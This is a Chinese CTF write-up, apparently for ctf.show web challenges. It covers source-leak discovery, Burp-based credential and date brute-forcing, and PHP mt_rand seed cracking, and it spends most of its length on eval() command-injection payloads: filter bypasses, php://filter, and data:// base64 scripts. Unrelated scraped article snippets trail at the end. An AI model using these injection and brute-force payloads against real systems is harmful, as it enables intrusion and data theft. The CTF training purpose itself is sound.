技术标签: 前端
直接查看源代码或F12检查即可看到flag
右键无法打开源代码,F12无响应
在URL前加"view-source:"即可打开网页源代码
或ctrl+u直接打开
F12检查 network F5刷新
或burtsuite抓包
robots文件是一个纯文本文件,也就是常见的.txt文件。
在URL后写入 robots.txt能看到flag文件的目录
再把flag文件的目录重新加到url后即可看到flag
引用:"备份文件
本题考查的是phps作为备份文件,泄露了源码
其他常见的有linux的备份文件,比如index.php.swp
还有www.zip等"
url后跟上/index.phps下载该文件,然后直接用浏览器打开即可
引用:"网站备份压缩文件 漏洞成因
在网站的升级和维护过程中,通常需要对网站中的文件进行修改。此时就需要对网站整站或者其中某一页面进行备份。
当备份文件或者修改过程中的缓存文件因为各种原因而被留在网站 web 目录下,而该目录又没有设置访问权限时,便有可能导致备份文件或者编辑器的缓存文件被下载,导致敏感信息泄露,给服务器的安全埋下隐患。
该漏洞的成因主要有是管理员将备份文件放在到 web 服务器可以访问的目录下。
该漏洞往往会导致服务器整站源代码或者部分页面的源代码被下载,利用。源代码中所包含的各类敏感信息,如服务器数据库连接信息,服务器配置信息等会因此而泄露,造成巨大的损失。
被泄露的源代码还可能会被用于代码审计,进一步利用而对整个系统的安全埋下隐患。"
访问www.zip下载解压后得到一个txt文件和一个php文件
index.php内容如下
访问fl000g.txt即可得到flag
什么是版本控制?为什么要有版本控制?常用的版本控制工具有哪些?_版本控制是什么意思-程序员宅基地
总结:Git是目前世界上最先进的分布式版本控制系统。
访问.git就可以直接重定向到.git/index.php
或者直接访问.git/index.php
.git换成.svn
1.robots.txt文件泄露,放在网站的跟目录下,用于限制浏览器的访问(哪些可以抓取,哪些不能抓取)用于防止黑客,但是任何人可在url中直接通过/robots.txt访问,导致网站结构被泄露。可对admin等重要文件设置密保保护,或者采取更换文件名的方法防御.
2.phps文件泄露,phps存放着php源码,可通过尝试访问/index.phps读取,或者尝试扫描工具扫描读取.
3..git文件泄露,当开发人员使用git控制版本时,如果操作不当,可能导致git流入线上环境,导致.git文件夹下的文件被访问,代码泄露,如.git/index文件可找到工程所有文件名和sha1文件,在git/objects下载导致危害
4.svn泄露,svn是源代码管理系统,在管理代码的过程中,会生成一个.svn的隐藏文件,导致源码泄露(造成原因是在发布代码时没有使用导入功能,而是直接粘贴复制)
5.vim缓存泄露,在使用vim进行编辑时,会产生缓存文件,操作正常,则会删除缓存文件,如果意外退出,缓存文件保留下来,这是时可以通过缓存文件来得到原文件,以index.php来说,第一次退出后,缓存文件名为 .index.php.swp,第二次退出后,缓存文件名为.index.php.swo,第三次退出后文件名为.index.php.swn
6.压缩文件也可能包含文件的源码等,注意rar zip后缀
————————————————
版权声明:本文为CSDN博主「伤心的小尾巴」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_59950255/article/details/121500183
这里考的是vim缓存泄露
因此可以尝试打开第一次退出时产生的这个文件,输入url/index.php.swp
下载打开文件得到flag
提示cookie那就想办法看到网站cookie
F12 network F5刷新 能直接找到flag,urldecode之后得到flag
或者burpsuite抓包也能直接看到cookie
这样设置
至于nslookup -query=all flag.ctfshow.com
听大手子讲是因为环境崩了跑不出来
用dirsearch查子域名,找到robots.txt(装dirsearch装了一晚上发现python安装的是exe)
访问robots.txt 里面有个/admin的目录
访问/admin 题目描述说是网上的公开信息就是管理员常用密码,猜测最开始网页底部的number为密码,用户名为admin,登录成功得到flag
题目描述说技术文档里不要出现敏感信息
网页下划到最下面找到document,点击下载pdf,里面有后台网址和用户名密码
http://your-domain/system1103/login.php
your-domain 实际上指的是"你的域名"也就是在题目链接后加上/system1103/login.php
登录即可得到flag
依旧是dirsearch起手,搜索到/editor路径,访问后进入编辑器,找到上传图片,图片空间或文件空间,遍历目录,var -> www -> html -> nothinghere -> fl000g.txt
访问url/nothinghere/fl000g.txt即可得到flag
dirsearch搜索到/admin/index.php,访问后是一个登录界面,下面有个忘记密码,进入后提示密保内容为“我的所在地”,回到起始页底下找到一个QQ邮箱,搜索邮箱发现所在地为西安,输入后可以将密码重置,用户名猜测为admin,登录后得到flag
什么是php探针,以及雅黑探针使用教程_雅黑php探针的作用-程序员宅基地
访问url/tz.php进入探针
点击PHPINFO进入后ctrl f 搜索ctfshow得到flag
dirsearch直接能扫出来backup.sql,访问下载打开即可
javascript游戏,查看网页源代码,再进入js文件,就算看不懂代码这一段也很可疑
unicode解码
访问110.php即可得到flag
查看网页源代码可以找到如下内容
用户名为admin 密码是AES加密的字符,使用AES解密后登录得到flag
dirsearch查询找到url/db/路径,再次查询url/db/路径找到url/db/db.mdb路径
访问下载打开找到flag或直接搜索flag字段
参考WP ctf.show
简单爆破的原理和详细操作
1:前提条件:已知用户名是admin。
2:打开代理和Burp Suite,随便输入密码123尝试登陆同时利用Burp Suite抓包。
3:已知:Authorization请求头用于验证是否有从服务器访问所需数据的权限。
4:查看Authorization请求头观察发现是base64编码,进行解码。
5:解码发现格式为admin:123,可以进行爆破。爆破原理:利用多个payload(进攻指令),对返回数据进行对比分析,得到唯一不同的就是可能的密码。
6:已知:Burp Intruder功能是在原始请求数据的基础上通过修改各种请求参数,从而获取不同的请求应答。
7:将所抓包send to intruder,选择sniper模式。
8:已知:sniper模式是设置一个爆破点,利用多个payload重复攻击一个爆破点。
用右边的add按键设置爆破点
9:加载题目所给字典,设置前缀admin:(因为字典中只包含了密码),并对其进行base64编码(匹配Authorization请求头格式)
10:进行爆破,找到状态不同的即为正确答案。
按照status排序一下防止星际玩家
11:解码,登录,找到flag。
或者直接看响应
环境烂了,做不了 仅存的WP ctf.show
360quake 使用空间搜索引擎--->360quake 搜索语法--->domain="ctf.show" 可以搜索出子域名--->vip.ctf.show 可以发现子域名vip.ctf.show下面有flag--->flag{ctf_show_web}
需要获取token,复合题目给出的token条件,其实就是爆破
遍历数字,取MD5值,匹配条件
import hashlib
for i in range(1,10000):
md5 = hashlib.md5(str(i).encode('utf-8')).hexdigest()
if md5[1] != md5[14] or md5[14]!= md5[17]:
continue
if(ord(md5[1]))>=48 and ord(md5[1])<=57 and (ord(md5[31]))>=48 and ord(md5[31])<=57:
if((int(md5[1])+int(md5[14])+int(md5[17]))/int(md5[1])==int(md5[31])):
print(i)
参考文章CTF_Web:php伪随机数mt_rand()函数+php_mt_seed工具使用_php伪随机数 github-程序员宅基地
大概意思就是mt_srand播种随机数生成器
mt_rand这个随机数生成器按照种子来生成随机数,也就是我们所谓的伪随机
只要知道了种子,就能固定生成某一个数
写PHP脚本如下,获得随机数为1155388967
访问URL/?1155388967即可
<?php
mt_srand(372619038);
echo intval(mt_rand())
?>
掐头去尾没用的部分
这段脚本首先给mt_srand()传了一个种子
当rand是正数的时候
如果Cookie中token等于mt_rand()+mt_rand()输出flag
否则输出rand的值
所以当r等于0时,输出的rand就等于第一次生成的mt_rand
访问url/?r=0可以得到这个数值,每个人得到的数值不一样
我这次得到的是-316428822
利用工具php_mt_seed来逆推种子
工具下载地址:php_mt_seed - PHP mt_rand() seed cracker
Download 4.0版本,放进kali中解压
tar -zxvf php_mt_seed-4.0.tar.gz
进入解压出的文件夹中./php_mt_seed.c
提示权限不足则输入命令:chmod 777 php_mt_seed.c 赋予权限
之后就可以使用了
第一次使用时候先输入make更新
然后输入time ./php_mt_seed rand值
运行完毕后会得到很多版本的种子值,通过bp抓包可以看到题目环境的php版本
选择对应版本的种子(我的是倒数第三个)
题目的脚本进行了三次mt_rand()操作,取后两次相加为token值,所以仿照题目写出脚本
<?php
mt_srand(427308533);
mt_rand();
$token = mt_rand()+mt_rand();
echo $token;
?>
运行后得到toke=1791014588
回到题目使用hackbar对题目传参
这样设置
什么都不输直接点安装就能在bp中找到flag(题目的问题吧)
可以看到题目中提供了这么一些表单
点击开始安装后,对应的我们在请求包中找到了这些值,所以把这个包发到爆破模块
上面四个信息按照上面提示的填,只需要爆破密码就行
考点在信息收集和日期爆破
登录需要输入学号和密码,点击录取名单可以获取到学生姓名和部分身份证号,中间的出生日期不知道
进入学院录取查询需要填写姓名和身份证号,那么我们只需要抓包爆破生日就行了
把payload type改成dates 下面的日期format要改成yyyyMMdd
找到长度不一样的结果查看返回包uudecode解码后得到学号信息
回到主界面用学号和身份证号登录得到flag
目录爆破
环境打开发现什么都没有,原来是URL自动重定向到了url/0/1/2.txt目录
bp抓包后发到爆破项
攻击模式设定为cluster bomb
爆破点设置在两个目录上,删除最后的2.txt
payload设置为number
开始爆破,响应状态码为200的响应包中带有flag
代码审计
eval函数可以执行php的其他函数
例如输入c=phpinfo();就能看到php版本信息等
首先利用eval函数的特性调用sysytem(ls);函数查看文件目录
url/?c=system(ls);
可以看到该目录下有flag.php 和 index.php两个文件
接下来就要想办法绕过"flag"这个关键词获取flag.php的内容
这里要用到通配符
c=system("cp fla?.php 1.txt");将flag.php中的内容复制到 1.txt中
然后直接访问url/1.txt即可
看wp有说直接c=system("cat fla?.php");的,但是我没成功
跟上一题差不多,只不过这次把system php 也给禁用了
需要使用其他函数执行命令,可以参考这篇文章PHP执行系统命令的有几个常用的函数_PHP教程-php教程-PHP中文网
这里使用反点号
url/?c=echo(`cp%20fla*g.p?p%201.txt`);
还是一样,只不过这次禁用的东西更多了
方法很多,这里只记录部分
?c=passthru("tac%09fla*"); tac绕过cat %09绕过空格 fla*绕过flag
?c=eval($_GET[1]);&1=passthru("tac%09fla*");嵌套eval()函数
?c=eval($_GET[1]);&1=passthru("tac\$IFS\$9fla*");$IFS$9绕过空格
?c=passthru("tac\$IFS\$9fla*")
?c=show_source(next(array_reverse(scandir(pos(localeconv())))));官方答案
localeconv可以返回包括小数点在内的一个数组;pos去取出数组中当前第一个元素,也就是小数点。 scandir可以结合它扫描当前目录内容。 ?c=print_r(scandir(pos(localeconv()))); 可以看到当前目录下有flag.php 通过array_reverse把数组逆序,通过next取到第二个数组元素,也即flag.php
一知半解 参考PHP 伪协议:使用 php://filter 为数据流应用过滤器_php:\//filter 无数字-程序员宅基地
/?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
大概是用include调用$_GET[1]
配合php伪协议php://gileter读取flag.php
几乎和上一题一样
直接用上一题的payload就能出
还是一样
还是
ban掉了数字0-9,之前用的参数是1,改成别的就行,实际上没区别
这题要用到data伪协议,格式是data://text/plain,脚本内容
除了除了"flag"几乎没有做出任何限制
?c=data://text/plain,<?php system("cat f*")?>
使用cat方法要右键查看网页源代码才能看到flag字符串
把cat换成tac就能直接在屏幕上看到flag字符串
如果ban掉了某些词可以使用base64加密后的脚本来进行绕过
data://text/plain;base64,base64加密后的脚本
?c=data://text/plain;base64,PD9waHAgCnN5c3RlbSgidGFjIGZsYWcucGhwIikKPz4=
增加了过滤条件,但经过base64加密后没区别,直接用上一题的payload
代码中给$c强加了一个".php"后缀
这里可以尝试写入一个php.info()或者echo "111"; 试试
?c=data://text/plain,<?php%20echo%20"11111"?>
因为写入的脚本中包含?>,所以脚本已经闭合了,后面添加的".php“会直接输出在屏幕上,所以对我们命令执行没有影响,直接cat flag就好
,<?=system("tac fla*.php");?>
明天写
文章浏览阅读3.8k次,点赞9次,收藏28次。直接上一个工作中碰到的问题,另外一个系统开启多线程调用我这边的接口,然后我这边会开启多线程批量查询第三方接口并且返回给调用方。使用的是两三年前别人遗留下来的方法,放到线上后发现确实是可以正常取到结果,但是一旦调用,CPU占用就直接100%(部署环境是win server服务器)。因此查看了下相关的老代码并使用JProfiler查看发现是在某个while循环的时候有问题。具体项目代码就不贴了,类似于下面这段代码。while(flag) {//your code;}这里的flag._main函数使用while(1)循环cpu占用99
文章浏览阅读347次。idea shift f6 快捷键无效_idea shift +f6快捷键不生效
文章浏览阅读135次。Ecmacript 中没有DOM 和 BOM核心模块Node为JavaScript提供了很多服务器级别,这些API绝大多数都被包装到了一个具名和核心模块中了,例如文件操作的 fs 核心模块 ,http服务构建的http 模块 path 路径操作模块 os 操作系统信息模块// 用来获取机器信息的var os = require('os')// 用来操作路径的var path = require('path')// 获取当前机器的 CPU 信息console.log(os.cpus._node模块中有很多核心模块,以下不属于核心模块,使用时需下载的是
文章浏览阅读10w+次,点赞435次,收藏3.4k次。SPSS 22 下载安装过程7.6 方差分析与回归分析的SPSS实现7.6.1 SPSS软件概述1 SPSS版本与安装2 SPSS界面3 SPSS特点4 SPSS数据7.6.2 SPSS与方差分析1 单因素方差分析2 双因素方差分析7.6.3 SPSS与回归分析SPSS回归分析过程牙膏价格问题的回归分析_化工数学模型数据回归软件
文章浏览阅读7.5k次。如何利用hutool工具包实现邮件发送功能呢?1、首先引入hutool依赖<dependency> <groupId>cn.hutool</groupId> <artifactId>hutool-all</artifactId> <version>5.7.19</version></dependency>2、编写邮件发送工具类package com.pc.c..._hutool发送邮件
文章浏览阅读867次,点赞2次,收藏2次。docker安装elasticsearch,elasticsearch-head,kibana,ik分词器安装方式基本有两种,一种是pull的方式,一种是Dockerfile的方式,由于pull的方式pull下来后还需配置许多东西且不便于复用,个人比较喜欢使用Dockerfile的方式所有docker支持的镜像基本都在https://hub.docker.com/docker的官网上能找到合..._docker安装kibana连接elasticsearch并且elasticsearch有密码
文章浏览阅读1.3w次,点赞57次,收藏92次。整理 | 郑丽媛出品 | CSDN(ID:CSDNnews)近年来,随着机器学习的兴起,有一门编程语言逐渐变得火热——Python。得益于其针对机器学习提供了大量开源框架和第三方模块,内置..._beeware
文章浏览阅读7.9k次。//// ViewController.swift// Day_10_Timer//// Created by dongqiangfei on 2018/10/15.// Copyright 2018年 飞飞. All rights reserved.//import UIKitclass ViewController: UIViewController { ..._swift timer 暂停
文章浏览阅读986次,点赞2次,收藏2次。1.硬性等待让当前线程暂停执行,应用场景:代码执行速度太快了,但是UI元素没有立马加载出来,造成两者不同步,这时候就可以让代码等待一下,再去执行找元素的动作线程休眠,强制等待 Thread.sleep(long mills)package com.example.demo;import org.junit.jupiter.api.Test;import org.openqa.selenium.By;import org.openqa.selenium.firefox.Firefox.._元素三大等待
文章浏览阅读3k次,点赞4次,收藏14次。Java软件工程师职位分析_java岗位分析
文章浏览阅读2k次。Java:Unreachable code的解决方法_java unreachable code
文章浏览阅读1w次。1、html中设置标签data-*的值 标题 11111 222222、点击获取当前标签的data-url的值$('dd').on('click', function() { var urlVal = $(this).data('ur_如何根据data-*属性获取对应的标签对象